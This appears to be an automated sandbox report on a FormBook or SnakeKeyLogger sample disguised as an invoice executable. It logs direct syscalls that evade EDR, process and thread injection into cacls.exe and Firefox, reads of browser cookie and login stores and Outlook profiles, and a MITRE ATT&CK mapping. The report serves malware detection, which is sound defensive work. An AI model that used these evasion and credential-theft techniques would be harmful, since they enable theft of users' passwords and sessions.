Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_017AEB1D mov eax, dword ptr fs:[00000030h]	3_2_017AEB1D
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_017AEB1D mov eax, dword ptr fs:[00000030h]	3_2_017AEB1D
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_017AEB1D mov eax, dword ptr fs:[00000030h]	3_2_017AEB1D
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_017AEB1D mov eax, dword ptr fs:[00000030h]	3_2_017AEB1D
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_017AEB1D mov eax, dword ptr fs:[00000030h]	3_2_017AEB1D
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_017AEB1D mov eax, dword ptr fs:[00000030h]	3_2_017AEB1D
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_01804B00 mov eax, dword ptr fs:[00000030h]	3_2_01804B00
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_01738BF0 mov eax, dword ptr fs:[00000030h]	3_2_01738BF0
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_01738BF0 mov eax, dword ptr fs:[00000030h]	3_2_01738BF0
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_01738BF0 mov eax, dword ptr fs:[00000030h]	3_2_01738BF0
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_0175EBFC mov eax, dword ptr fs:[00000030h]	3_2_0175EBFC
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_017BCBF0 mov eax, dword ptr fs:[00000030h]	3_2_017BCBF0
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_017DEBD0 mov eax, dword ptr fs:[00000030h]	3_2_017DEBD0
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_01750BCB mov eax, dword ptr fs:[00000030h]	3_2_01750BCB
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_01750BCB mov eax, dword ptr fs:[00000030h]	3_2_01750BCB
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_01750BCB mov eax, dword ptr fs:[00000030h]	3_2_01750BCB
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_01730BCD mov eax, dword ptr fs:[00000030h]	3_2_01730BCD
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_01730BCD mov eax, dword ptr fs:[00000030h]	3_2_01730BCD
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_01730BCD mov eax, dword ptr fs:[00000030h]	3_2_01730BCD
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_01740BBE mov eax, dword ptr fs:[00000030h]	3_2_01740BBE
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_01740BBE mov eax, dword ptr fs:[00000030h]	3_2_01740BBE
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_017E4BB0 mov eax, dword ptr fs:[00000030h]	3_2_017E4BB0
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_017E4BB0 mov eax, dword ptr fs:[00000030h]	3_2_017E4BB0
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_01802B57 mov eax, dword ptr fs:[00000030h]	3_2_01802B57
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_01802B57 mov eax, dword ptr fs:[00000030h]	3_2_01802B57
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_01802B57 mov eax, dword ptr fs:[00000030h]	3_2_01802B57
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_01802B57 mov eax, dword ptr fs:[00000030h]	3_2_01802B57
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_01804A80 mov eax, dword ptr fs:[00000030h]	3_2_01804A80
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_017ACA72 mov eax, dword ptr fs:[00000030h]	3_2_017ACA72
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_017ACA72 mov eax, dword ptr fs:[00000030h]	3_2_017ACA72
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_0176CA6F mov eax, dword ptr fs:[00000030h]	3_2_0176CA6F
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_0176CA6F mov eax, dword ptr fs:[00000030h]	3_2_0176CA6F
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_0176CA6F mov eax, dword ptr fs:[00000030h]	3_2_0176CA6F
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_017DEA60 mov eax, dword ptr fs:[00000030h]	3_2_017DEA60
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_01736A50 mov eax, dword ptr fs:[00000030h]	3_2_01736A50
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_01736A50 mov eax, dword ptr fs:[00000030h]	3_2_01736A50
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_01736A50 mov eax, dword ptr fs:[00000030h]	3_2_01736A50
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_01736A50 mov eax, dword ptr fs:[00000030h]	3_2_01736A50
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_01736A50 mov eax, dword ptr fs:[00000030h]	3_2_01736A50
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_01736A50 mov eax, dword ptr fs:[00000030h]	3_2_01736A50
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_01736A50 mov eax, dword ptr fs:[00000030h]	3_2_01736A50
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_01740A5B mov eax, dword ptr fs:[00000030h]	3_2_01740A5B
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_01740A5B mov eax, dword ptr fs:[00000030h]	3_2_01740A5B
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_01754A35 mov eax, dword ptr fs:[00000030h]	3_2_01754A35
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_01754A35 mov eax, dword ptr fs:[00000030h]	3_2_01754A35
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_0176CA38 mov eax, dword ptr fs:[00000030h]	3_2_0176CA38
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_0176CA24 mov eax, dword ptr fs:[00000030h]	3_2_0176CA24
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_0175EA2E mov eax, dword ptr fs:[00000030h]	3_2_0175EA2E
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_017BCA11 mov eax, dword ptr fs:[00000030h]	3_2_017BCA11
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_0176AAEE mov eax, dword ptr fs:[00000030h]	3_2_0176AAEE
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_0176AAEE mov eax, dword ptr fs:[00000030h]	3_2_0176AAEE
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_01730AD0 mov eax, dword ptr fs:[00000030h]	3_2_01730AD0
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_01764AD0 mov eax, dword ptr fs:[00000030h]	3_2_01764AD0
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_01764AD0 mov eax, dword ptr fs:[00000030h]	3_2_01764AD0
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_01786ACC mov eax, dword ptr fs:[00000030h]	3_2_01786ACC
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_01786ACC mov eax, dword ptr fs:[00000030h]	3_2_01786ACC
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_01786ACC mov eax, dword ptr fs:[00000030h]	3_2_01786ACC
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_01738AA0 mov eax, dword ptr fs:[00000030h]	3_2_01738AA0
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_01738AA0 mov eax, dword ptr fs:[00000030h]	3_2_01738AA0
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_01786AA4 mov eax, dword ptr fs:[00000030h]	3_2_01786AA4
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Code function: 3_2_01768A90 mov edx, dword ptr fs:[00000030h]	3_2_01768A90

Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Found direct / indirect Syscall (likely to bypass EDR)

Source: C:\Program Files (x86)\KsAbjxnfRomHREeeFwXVZZDoIDFHmaxVzTjxOZcfPwBquTNWSye\fXZvHKoWCzop.exe	NtResumeThread: Direct from: 0x773836AC	Jump to behavior
Source: C:\Program Files (x86)\KsAbjxnfRomHREeeFwXVZZDoIDFHmaxVzTjxOZcfPwBquTNWSye\fXZvHKoWCzop.exe	NtMapViewOfSection: Direct from: 0x77382D1C	Jump to behavior
Source: C:\Program Files (x86)\KsAbjxnfRomHREeeFwXVZZDoIDFHmaxVzTjxOZcfPwBquTNWSye\fXZvHKoWCzop.exe	NtWriteVirtualMemory: Direct from: 0x77382E3C	Jump to behavior
Source: C:\Program Files (x86)\KsAbjxnfRomHREeeFwXVZZDoIDFHmaxVzTjxOZcfPwBquTNWSye\fXZvHKoWCzop.exe	NtProtectVirtualMemory: Direct from: 0x77382F9C	Jump to behavior
Source: C:\Program Files (x86)\KsAbjxnfRomHREeeFwXVZZDoIDFHmaxVzTjxOZcfPwBquTNWSye\fXZvHKoWCzop.exe	NtSetInformationThread: Direct from: 0x773763F9	Jump to behavior
Source: C:\Program Files (x86)\KsAbjxnfRomHREeeFwXVZZDoIDFHmaxVzTjxOZcfPwBquTNWSye\fXZvHKoWCzop.exe	NtCreateMutant: Direct from: 0x773835CC	Jump to behavior
Source: C:\Program Files (x86)\KsAbjxnfRomHREeeFwXVZZDoIDFHmaxVzTjxOZcfPwBquTNWSye\fXZvHKoWCzop.exe	NtNotifyChangeKey: Direct from: 0x77383C2C	Jump to behavior
Source: C:\Program Files (x86)\KsAbjxnfRomHREeeFwXVZZDoIDFHmaxVzTjxOZcfPwBquTNWSye\fXZvHKoWCzop.exe	NtSetInformationProcess: Direct from: 0x77382C5C	Jump to behavior
Source: C:\Program Files (x86)\KsAbjxnfRomHREeeFwXVZZDoIDFHmaxVzTjxOZcfPwBquTNWSye\fXZvHKoWCzop.exe	NtCreateUserProcess: Direct from: 0x7738371C	Jump to behavior
Source: C:\Program Files (x86)\KsAbjxnfRomHREeeFwXVZZDoIDFHmaxVzTjxOZcfPwBquTNWSye\fXZvHKoWCzop.exe	NtQueryInformationProcess: Direct from: 0x77382C26	Jump to behavior
Source: C:\Program Files (x86)\KsAbjxnfRomHREeeFwXVZZDoIDFHmaxVzTjxOZcfPwBquTNWSye\fXZvHKoWCzop.exe	NtResumeThread: Direct from: 0x77382FBC	Jump to behavior
Source: C:\Program Files (x86)\KsAbjxnfRomHREeeFwXVZZDoIDFHmaxVzTjxOZcfPwBquTNWSye\fXZvHKoWCzop.exe	NtWriteVirtualMemory: Direct from: 0x7738490C	Jump to behavior
Source: C:\Program Files (x86)\KsAbjxnfRomHREeeFwXVZZDoIDFHmaxVzTjxOZcfPwBquTNWSye\fXZvHKoWCzop.exe	NtAllocateVirtualMemory: Direct from: 0x77383C9C	Jump to behavior
Source: C:\Program Files (x86)\KsAbjxnfRomHREeeFwXVZZDoIDFHmaxVzTjxOZcfPwBquTNWSye\fXZvHKoWCzop.exe	NtReadFile: Direct from: 0x77382ADC	Jump to behavior
Source: C:\Program Files (x86)\KsAbjxnfRomHREeeFwXVZZDoIDFHmaxVzTjxOZcfPwBquTNWSye\fXZvHKoWCzop.exe	NtAllocateVirtualMemory: Direct from: 0x77382BFC	Jump to behavior
Source: C:\Program Files (x86)\KsAbjxnfRomHREeeFwXVZZDoIDFHmaxVzTjxOZcfPwBquTNWSye\fXZvHKoWCzop.exe	NtDelayExecution: Direct from: 0x77382DDC	Jump to behavior
Source: C:\Program Files (x86)\KsAbjxnfRomHREeeFwXVZZDoIDFHmaxVzTjxOZcfPwBquTNWSye\fXZvHKoWCzop.exe	NtQuerySystemInformation: Direct from: 0x77382DFC	Jump to behavior
Source: C:\Program Files (x86)\KsAbjxnfRomHREeeFwXVZZDoIDFHmaxVzTjxOZcfPwBquTNWSye\fXZvHKoWCzop.exe	NtOpenSection: Direct from: 0x77382E0C	Jump to behavior
Source: C:\Program Files (x86)\KsAbjxnfRomHREeeFwXVZZDoIDFHmaxVzTjxOZcfPwBquTNWSye\fXZvHKoWCzop.exe	NtQueryVolumeInformationFile: Direct from: 0x77382F2C	Jump to behavior
Source: C:\Program Files (x86)\KsAbjxnfRomHREeeFwXVZZDoIDFHmaxVzTjxOZcfPwBquTNWSye\fXZvHKoWCzop.exe	NtQuerySystemInformation: Direct from: 0x773848CC	Jump to behavior
Source: C:\Program Files (x86)\KsAbjxnfRomHREeeFwXVZZDoIDFHmaxVzTjxOZcfPwBquTNWSye\fXZvHKoWCzop.exe	NtReadVirtualMemory: Direct from: 0x77382E8C	Jump to behavior
Source: C:\Program Files (x86)\KsAbjxnfRomHREeeFwXVZZDoIDFHmaxVzTjxOZcfPwBquTNWSye\fXZvHKoWCzop.exe	NtCreateKey: Direct from: 0x77382C6C	Jump to behavior
Source: C:\Program Files (x86)\KsAbjxnfRomHREeeFwXVZZDoIDFHmaxVzTjxOZcfPwBquTNWSye\fXZvHKoWCzop.exe	NtClose: Direct from: 0x77382B6C
Source: C:\Program Files (x86)\KsAbjxnfRomHREeeFwXVZZDoIDFHmaxVzTjxOZcfPwBquTNWSye\fXZvHKoWCzop.exe	NtAllocateVirtualMemory: Direct from: 0x773848EC	Jump to behavior
Source: C:\Program Files (x86)\KsAbjxnfRomHREeeFwXVZZDoIDFHmaxVzTjxOZcfPwBquTNWSye\fXZvHKoWCzop.exe	NtQueryAttributesFile: Direct from: 0x77382E6C	Jump to behavior
Source: C:\Program Files (x86)\KsAbjxnfRomHREeeFwXVZZDoIDFHmaxVzTjxOZcfPwBquTNWSye\fXZvHKoWCzop.exe	NtSetInformationThread: Direct from: 0x77382B4C	Jump to behavior
Source: C:\Program Files (x86)\KsAbjxnfRomHREeeFwXVZZDoIDFHmaxVzTjxOZcfPwBquTNWSye\fXZvHKoWCzop.exe	NtQueryInformationToken: Direct from: 0x77382CAC	Jump to behavior
Source: C:\Program Files (x86)\KsAbjxnfRomHREeeFwXVZZDoIDFHmaxVzTjxOZcfPwBquTNWSye\fXZvHKoWCzop.exe	NtOpenKeyEx: Direct from: 0x77382B9C	Jump to behavior
Source: C:\Program Files (x86)\KsAbjxnfRomHREeeFwXVZZDoIDFHmaxVzTjxOZcfPwBquTNWSye\fXZvHKoWCzop.exe	NtAllocateVirtualMemory: Direct from: 0x77382BEC	Jump to behavior
Source: C:\Program Files (x86)\KsAbjxnfRomHREeeFwXVZZDoIDFHmaxVzTjxOZcfPwBquTNWSye\fXZvHKoWCzop.exe	NtDeviceIoControlFile: Direct from: 0x77382AEC	Jump to behavior
Source: C:\Program Files (x86)\KsAbjxnfRomHREeeFwXVZZDoIDFHmaxVzTjxOZcfPwBquTNWSye\fXZvHKoWCzop.exe	NtCreateFile: Direct from: 0x77382FEC	Jump to behavior
Source: C:\Program Files (x86)\KsAbjxnfRomHREeeFwXVZZDoIDFHmaxVzTjxOZcfPwBquTNWSye\fXZvHKoWCzop.exe	NtOpenFile: Direct from: 0x77382DCC	Jump to behavior
Source: C:\Program Files (x86)\KsAbjxnfRomHREeeFwXVZZDoIDFHmaxVzTjxOZcfPwBquTNWSye\fXZvHKoWCzop.exe	NtTerminateThread: Direct from: 0x77377B2E	Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe

Memory written: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe base: 400000 value starts with: 4D5A

Jump to behavior

Maps a DLL or memory area into another process

Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Section loaded: NULL target: C:\Program Files (x86)\KsAbjxnfRomHREeeFwXVZZDoIDFHmaxVzTjxOZcfPwBquTNWSye\fXZvHKoWCzop.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Section loaded: NULL target: C:\Windows\SysWOW64\cacls.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\cacls.exe	Section loaded: NULL target: C:\Program Files (x86)\KsAbjxnfRomHREeeFwXVZZDoIDFHmaxVzTjxOZcfPwBquTNWSye\fXZvHKoWCzop.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\cacls.exe	Section loaded: NULL target: C:\Program Files (x86)\KsAbjxnfRomHREeeFwXVZZDoIDFHmaxVzTjxOZcfPwBquTNWSye\fXZvHKoWCzop.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\cacls.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\cacls.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write	Jump to behavior

Modifies the context of a thread in another process (thread injection)

Source: C:\Windows\SysWOW64\cacls.exe

Thread register set: target process: 6404

Jump to behavior

Queues an APC in another process (thread injection)

Source: C:\Windows\SysWOW64\cacls.exe

Thread APC queued: target process: C:\Program Files (x86)\KsAbjxnfRomHREeeFwXVZZDoIDFHmaxVzTjxOZcfPwBquTNWSye\fXZvHKoWCzop.exe

Jump to behavior

Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Process created: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe "C:\Users\user\Desktop\FACTURA 24V70 VINS.exe"	Jump to behavior
Source: C:\Program Files (x86)\KsAbjxnfRomHREeeFwXVZZDoIDFHmaxVzTjxOZcfPwBquTNWSye\fXZvHKoWCzop.exe	Process created: C:\Windows\SysWOW64\cacls.exe "C:\Windows\SysWOW64\cacls.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\cacls.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"	Jump to behavior

Source: fXZvHKoWCzop.exe, 0000000B.00000000.2950711553.0000000000E81000.00000002.00000001.00040000.00000000.sdmp, fXZvHKoWCzop.exe, 0000000B.00000002.4649775732.0000000000E81000.00000002.00000001.00040000.00000000.sdmp, fXZvHKoWCzop.exe, 0000000E.00000000.3123706382.0000000000E81000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: IProgram Manager
Source: fXZvHKoWCzop.exe, 0000000B.00000000.2950711553.0000000000E81000.00000002.00000001.00040000.00000000.sdmp, fXZvHKoWCzop.exe, 0000000B.00000002.4649775732.0000000000E81000.00000002.00000001.00040000.00000000.sdmp, fXZvHKoWCzop.exe, 0000000E.00000000.3123706382.0000000000E81000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: fXZvHKoWCzop.exe, 0000000B.00000000.2950711553.0000000000E81000.00000002.00000001.00040000.00000000.sdmp, fXZvHKoWCzop.exe, 0000000B.00000002.4649775732.0000000000E81000.00000002.00000001.00040000.00000000.sdmp, fXZvHKoWCzop.exe, 0000000E.00000000.3123706382.0000000000E81000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: fXZvHKoWCzop.exe, 0000000B.00000000.2950711553.0000000000E81000.00000002.00000001.00040000.00000000.sdmp, fXZvHKoWCzop.exe, 0000000B.00000002.4649775732.0000000000E81000.00000002.00000001.00040000.00000000.sdmp, fXZvHKoWCzop.exe, 0000000E.00000000.3123706382.0000000000E81000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock

Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Queries volume information: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\FACTURA 24V70 VINS.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected FormBook

Source: Yara match	File source: 3.2.FACTURA 24V70 VINS.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.FACTURA 24V70 VINS.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000C.00000002.4650294834.0000000003580000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.4650098497.0000000003530000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.4648426160.0000000000880000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.4647387112.0000000002D90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.3039119542.0000000002F50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.4649948370.0000000003690000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.3037420382.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.3038070342.0000000001620000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\SysWOW64\cacls.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\cacls.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\cacls.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State	Jump to behavior
Source: C:\Windows\SysWOW64\cacls.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Windows\SysWOW64\cacls.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\cacls.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\cacls.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State	Jump to behavior
Source: C:\Windows\SysWOW64\cacls.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\SysWOW64\cacls.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

Jump to behavior

Remote Access Functionality

Yara detected FormBook

Source: Yara match	File source: 3.2.FACTURA 24V70 VINS.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.FACTURA 24V70 VINS.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000C.00000002.4650294834.0000000003580000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.4650098497.0000000003530000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.4648426160.0000000000880000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.4647387112.0000000002D90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.3039119542.0000000002F50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.4649948370.0000000003690000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.3037420382.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.3038070342.0000000001620000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	Windows Management Instrumentation	1 Services File Permissions Weakness	412 Process Injection	1 Masquerading	1 OS Credential Dumping	121 Security Software Discovery	Remote Services	1 Email Collection	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	1 DLL Side-Loading	1 Abuse Elevation Control Mechanism	1 Disable or Modify Tools	LSASS Memory	2 Process Discovery	Remote Desktop Protocol	1 Archive Collected Data	3 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 Services File Permissions Weakness	41 Virtualization/Sandbox Evasion	Security Account Manager	41 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	1 Data from Local System	4 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	1 DLL Side-Loading	412 Process Injection	NTDS	1 Application Window Discovery	Distributed Component Object Model	Input Capture	4 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Deobfuscate/Decode Files or Information	LSA Secrets	2 File and Directory Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Abuse Elevation Control Mechanism	Cached Domain Credentials	113 System Information Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	4 Obfuscated Files or Information	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 Services File Permissions Weakness	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	12 Software Packing	/etc/passwd and /etc/shadow	Network Sniffing	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	1 DLL Side-Loading	Network Sniffing	Network Service Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
FACTURA 24V70 VINS.exe	63%	ReversingLabs	ByteCode-MSIL.Trojan.SnakeKeyLogger
FACTURA 24V70 VINS.exe	100%	Joe Sandbox ML

